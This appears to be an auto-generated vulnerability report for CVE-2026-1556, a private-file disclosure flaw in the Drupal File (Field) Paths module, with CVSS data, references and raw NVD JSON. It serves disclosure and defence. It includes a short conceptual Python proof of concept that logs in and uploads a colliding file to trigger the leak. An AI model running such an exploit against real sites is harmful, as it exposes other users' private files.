Security Vulnerability Report
CVE-2026-1556 CVSS 6.5 MEDIUM

CVE-2026-1556

Published: 2026-03-26 22:16:28
Last Modified: 2026-04-02 20:33:54

Description

Information disclosure in the file URI processing of File (Field) Paths in Drupal File (Field) Paths 7.x prior to 7.1.3 on Drupal 7.x allows authenticated users to disclose other users’ private files via filename‑collision uploads. This can cause hook_node_insert() consumers (for example, email attachment modules) to receive the wrong file URI, bypassing normal access controls on private files.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:deciphered:filefield_paths:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal File (Field) Paths 7.x < 7.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# This is a conceptual Proof of Concept (PoC) for CVE-2026-1556
# It demonstrates how an authenticated user might attempt to trigger the file disclosure.
# Requires valid session cookies and knowledge of the target file structure.

target_url = "http://example-drupal-site/node/add/page"
login_url = "http://example-drupal-site/user"

# Attacker credentials
username = "attacker"
password = "password"

# File to simulate collision (assuming victim has 'secret.pdf')
files = {
    'files[field_file_und_0]': ('secret.pdf', 'This is the attacker uploaded content', 'application/pdf')
}

data = {
    'title': 'PoC Attack',
    'form_id': 'page_node_form',
    'form_build_id': 'form-xxx'  # Needs to be fetched dynamically
}

session = requests.Session()

# 1. Login to get authenticated session
login_data = {
    'name': username,
    'pass': password,
    'form_id': 'user_login',
    'op': 'Log in'
}
session.post(login_url, data=login_data)

# 2. Upload the file to trigger the collision vulnerability
response = session.post(target_url, files=files, data=data)

if response.status_code == 200:
    print("[+] Upload request sent. Check email attachments or logs for leaked URI.")
else:
    print("[-] Request failed.")
```

References

https://d7es.tag1.com/security-advisories/file-field-paths-moderately-critical-file-path-manipulation (Third Party Advisory)
https://www.herodevs.com/vulnerability-directory/cve-2026-1556 (Exploit, Third Party Advisory, Mitigation)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-1556", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:27.843", "lastModified": "2026-04-02T20:33:54.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information disclosure in the file URI processing of File (Field) Paths in Drupal File (Field) Paths 7.x prior to 7.1.3 on Drupal 7.x allows authenticated users to disclose other users’ private files via filename‑collision uploads. This can cause hook_node_insert() consumers (for example, email attachment modules) to receive the wrong file URI, bypassing normal access controls on private files."}, {"lang": "es", "value": "Revelación de información en el procesamiento de URI de archivo de Rutas de Archivo (Campo) en Drupal File (Field) Paths 7.x anterior a 7.1.3 en Drupal 7.x permite a usuarios autenticados revelar archivos privados de otros usuarios mediante cargas por colisión de nombres de archivo. Esto puede causar que consumidores de hook_node_insert() (por ejemplo, módulos de adjuntos de correo electrónico) reciban la URI de archivo incorrecta, eludiendo los controles de acceso normales en archivos privados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", 
"availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deciphered:filefield_paths:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "7.x-1.3", "matchCriteriaId": "FD9688B8-4C6B-4E8F-8C39-8D46941E9A01"}]}]}], "references": [{"url": "https://d7es.tag1.com/security-advisories/file-field-paths-moderately-critical-file-path-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-1556", 
"source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}]}}
```